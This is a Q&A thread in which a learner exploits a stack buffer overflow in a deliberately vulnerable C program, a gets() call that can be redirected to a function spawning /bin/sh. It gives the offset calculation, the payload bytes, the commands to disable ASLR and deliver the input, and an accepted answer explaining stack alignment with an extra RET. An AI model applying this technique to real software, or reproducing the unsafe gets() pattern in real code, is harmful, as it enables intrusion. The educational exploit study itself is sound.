# /bin/sh closes immediately without waiting for user input

Tags: bash, shell, terminal, security, pipe

I am exploiting a Buffer Overflow vulnerability for educational purposes. My goal is to trigger a shell by changing the RIP and targeting the evil function. I am using Ubuntu 18.04 64-bits. Here is code.c:

```
#include <stdio.h>
#include <stdlib.h>

void main(void)

{
  char buf[20];
  printf("Give me your name: ");
  gets(buf);
  printf("\nYour name is %s\n", buf);
  return;
}

void evil(){
    printf("Evil function entered\n");
    system("/bin/sh");
    printf("Evil function exited\n");
    return;
}
```

In order to make things simple, I compiled this code using the GCC option `-fno-stack-protector`, which disables canaries. Also, I disabled ASLR with the following command: `sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'`. Thus, memory addresses of the program never change, which makes things a lot easier.

In the compiled version of code.c I got the following information with GDB:

Buffer start at: `0x7fffffffde80`

RIP stored at: `0x7fffffffdea8`

`0x7fffffffdea8 - 0x7fffffffde80 = 40`. So, we need to insert a padding of 40 bytes.

The entry of the evil funcion is located at `0x55555555475f`, which in little-endian looks like:

`\x5f\x47\x55\x55\x55\x55\x00\x00`  (two \x00 are added to make the whole 8-byte address)

The final payload looks like this:

```
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x5f\x47\x55\x55\x55\x55\x00\x00
```

Now, I store it in a file:

```
echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x5f\x47\x55\x55\x55\x55\x00\x00" > input.txt
```

Finally, I run the program and pass the `input.txt` content as input:

```
cat input.txt - | ./code
```

Notice the `-` to [**prevent cat from exiting**](https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode/120501#120501).

My terminal shows:

```
Give me your name: 
Your name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_GUUUU
Evil function entered
Evil function exited
Program received signal SIGSEGV. Segmentation fault. Core dumped.
```

Surprisingly, the evil function is executed but `/bin/sh` is not popped. It closes immediately without asking the user for commands. It looks like the stdin is being detached from the terminal at some point.

The question is: How can I pop the shell in order to execute commands? Is this some kind of security protection?

Thanks.

Comment: The shell's input is still redirected from input.txt, which is at EOF. Either add commands to it (probably after a newline), or use `system("/bin/sh </dev/tty")`.

Comment: Thanks for your response! The idea of the game is that the evil function can not be modified, so the second option is not suitable for me. With regard to the first option, why is it at EOF? I used the dash to tell cat to hang on for more input, as explained here: https://security.stackexchange.com/questions/73878/program-exiting-after-executing-int-0x80-instruction-when-running-shellcode/120501#120501

Comment: Ah, I missed the `-`. In that case, I'm not sure, but I'd still be tempted to try `</dev/tty` as a test.

Comment: I get the same result. The shell does not show, but the evil function is correctly executed. I'm starting to think this could be OS-specific or some kind of security measure. I will try in a different platform. Thanks for your help.

Comment: I confirm that **this only happens in Ubuntu 18.04**. I have tried in Kali Linux and works like a charm with `cat input.txt - | ./code
`. The shell is triggered and I can execute as many commands as I want. I will search for more information, but this is a very strange behaviour. It must be some sort of security measure.

Comment: On Ubuntu, can you do: `cat - | /bin/sh`, then type commands and see it do what you expect?  If that doesn't work, then that might help isolate the problem.

Comment: Thanks Andy. I have just tried `cat - | /bin/sh` and It works well. I can type commands and get the output. This is so strange.

Answer (score 1, accepted):

I finally solved this problem.

[The C library's system() function fails to execute when the stack is not 16-byte aligned.](https://stackoverflow.com/questions/54393105/libcs-system-when-the-stack-pointer-is-not-16-padded-causes-segmentation-faul)

In my case, I forgot to align the stack on a 16-byte boundary, that's why `system("/bin/sh");` was not executing correctly, and therefore not triggering the shell.

In fact, in x86-64, the [System V ABI mandates that the stack should be 16-byte aligned](https://en.wikipedia.org/wiki/X86_calling_conventions#System_V_AMD64_ABI) before executing a CALL assembly instruction. Otherwise, the result is unpredictable. So this does not apply only for the system() function but for any function.

Since my stack was misaligned by 8 bytes, adding an additional RET to the ROP chain leads to a correctly aligned stack.

Now I have got it working.